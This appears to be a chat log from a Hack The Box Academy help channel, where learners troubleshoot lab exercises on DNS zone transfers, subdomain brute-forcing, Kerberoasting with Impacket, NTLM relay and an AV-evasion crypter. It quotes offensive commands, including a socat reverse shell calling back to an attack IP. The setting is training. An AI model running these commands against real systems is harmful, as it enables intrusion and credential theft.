An fqdn is comprised of multiple parts. Sub.domain.tld

(Tld is like .com, .net, .htb)

sub can also be www just in case

having this problem

yeah thats what i was talking about

how do i fix it?

that was my problem and hated it

ahh

did u manage to fix it?

yeah but that was a longgg time ago thats why i was asking again to see what i did to fix it

adding it to /etc/hosts wont fix it so that wont work

ahh

i think u need to use the ns record

you see the ns record in the photo u sent

yea? the one above

replace the @ip with the @ns.inlanefreight.htb

wdym?

ahh ok

and do zone transfer that way

see if that works

so instead of ip addess I have the domain name and the @ns.inlane...?

yeah see if that works for zone transfer

didnt work 😅

welp dns is my weakness i swear LOL

ima review that module again rn

its okay lol..ill wait for marcie or someone else to reply

thanks tho bro

ima get it watch

in a few min ima get it down

🙌

@pine dune im so dumb

ok so basically u cant always zone transfer

like the dev.inlanefreight.htb u cant zone transfer

and the @ns.inlanefreight.htb no need to do that just keep the target ip

plus u would need to add the ns.inlanefreight.htb to /etc/hosts so no point

i did that initially but it didnt work 😅

ik but im saying keep it with the target ip

and zone transfer a diff sub domain u found

like internal.inlanefreight.htb

so dig axfr internal.inlanefreight.htb @ip

yeah im saying that it wont let u zone transfer at all

for that specific sub domain ? ^

yup

ahh

let me try another

so try a diff one and see if it will let u

ok cool

thanks a lot bro...it worked

yupp anytime

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

last question...ive tried enumerating all the subdomains from the command u told me @wanton idol but none of them seem to work

I'm having issues with socat instantly dropping the reverse shell connection. It will call back to the listener and then drop. I'm using socat TCP-L:<PORT> FILE:``tty``,raw,echo=0 as the listener and socat TCP:<ATTACK-IP>:<PORT> EXEC:“bash -li”,pty,stderr,sigint,sane. I'm not using setsid because it breaks my command. I used the -h and checked others commands. However, they all seem a little different where they place "bash" and "EXEC" does that matter?

this one u would have to brute force it

i suggest with dnsenum

can u give me some guidance?

dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

thanks

yupp and for the inlanefreight.htb make sure u change it to like all of the sub domains u have found and try it on dev.inlanefreight.htb since itll brute force it will find some stuff for us

okay thanks...rn im tryna locate my seclists lol

this is what i got 😅

@wanton idol

why there's ~

at the end ?

^

oh shit my bad

lol

can anyone here confirm that the target are spawning normally ?

targets been spawning normally for me

been spawning normally for me..but I was having vpn issue before

was working fine , now I can't spawn

try switching to a diff vpn

the VPN is fine , seems like frontend error

So I'm on 'Kerberoasting - from Linux' in the 'Active Directory Enumeration & Attacks' module...continuing to get "[Errno 104] Connection reset by peer"

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Having no issues Listing SPN Accounts, but adding in the -request above doesn't render one TGS Ticket due to the connection reset by peer error. Any suggestions, as that is the exact command listed in the solution? I've reset the Target server once already

still got this 😅

Impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

is the command being run

try with -request-user user

i've done that as well

same connection reset by peer error

have u tried python3 then the rest of the command?

well damn

D:

no worries tho

some reason that wont work then use this

try sudo ntpdate -u 172.16.5.5

everything im telling u is from the module

for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

I've been having issues accessing the targets as well

python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request just for fun and same issue

it's working for me now

did you try ntpdate

thanks..let me try that

ntpdate command not found on attack server, same with sudo

I can't even ping the target damn

thats why then

try ping 10.10.14.1

LOL refresh your page and see if your target has expired

weird GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'

I'm not new the HTB, i'm aware of this. Even with a fresh target, I've just been having issues today

fs fs

terminal seems to have crashed

no just wait

ok

Not sure how to post screenshots and won't post the entire output as text because it's too big, but same issue with this command

probably just going to hang it up on this module tonight and try it again later

Thanks for the offers to help

How can I solve this problem? The VPN was working for me an hour ago, but it did not work

Restart VM

Read #welcome and register your account. As far as your issue goes are you by chance on US3 for the VPN.

not work

what is that ??

i made a pdf so i don't have to type it 80 times a day

hahah nice

But this is not my problem

my prob in vpn

the guide covers that at step 5

hh ok

well ns.inlanefreight.htb isn't in your /etc/hosts

try with the actual IP of the host

still stuck.... 😦

How can someone help you if they don't know exactly what you're working on?
The Academy now has 102 modules. Each module has several sections.

Without precise information about which module in which section and which question you are currently working on, it is impossible to offer you help

Am I understanding something wrong? In the new module "DACL Attacks II" and section Logon Scripts module tells to RDP with julios credentials, but I just get wrong username/password. There is no spawn machine button in that section so I expect that we should use the machine from previous section Shadow Credentials. So basically I'm stuck now because credentials are not working.

This is from section Logon Scripts questions.

Bloodhound tells that there is no user called "julio" in the lab spawned from previous section.

Hi, I am doing the first exercise of Attacking SQL Databases section of "ATTACKING COMMON SERVICES" module. I have got the NTLMv2-SSP Hash of the mssqlsvc user. But when I try to crack the hash using hashcat mode 5600, it doesn't do anything. Now, I am trying to use impacket-ntlmrelayx to execute commands on the target server itself. I get the connection to the SMB server on my attackbox, but then the error pops up and the command doesn't get executed:

[*] SMBD-Thread-5: Received connection from 10.129.25.56, attacking target smb://10.129.25.56
[-] SMBClient error: Connection was reset
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbserver.py", line 4441, in processRequest
    respCommands, respPackets, errorCode = self.__smb2Commands[smb2.SMB2_NEGOTIATE](
  File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 158, in SmbNegotiate
    connData['EncryptionKey'] = client.getStandardSecurityChallenge()
  File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/clients/smbrelayclient.py", line 603, in getStandardSecurityChallenge
    if self.session.getDialect() == SMB_DIALECT:
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 206, in getDialect
    return self._SMBConnection.getDialect()
AttributeError: 'int' object has no attribute 'getDialect'

For simplicity, I am just executing whoami command using the -c flag. But cannot get the output. What am I doing wrong?

Hi - Im working through Introduction to Windows Evasion Techniques. im having issue with the crypter in the static section, specifically wondering what data i enter into cyberchef? (do i include the starting variables, or just the shellcode separated by commas?) please @ and/or DM me if you can help!!!

im not able to get the flag to generate, figure its the Loader code, probably the aes stuff not properly decoding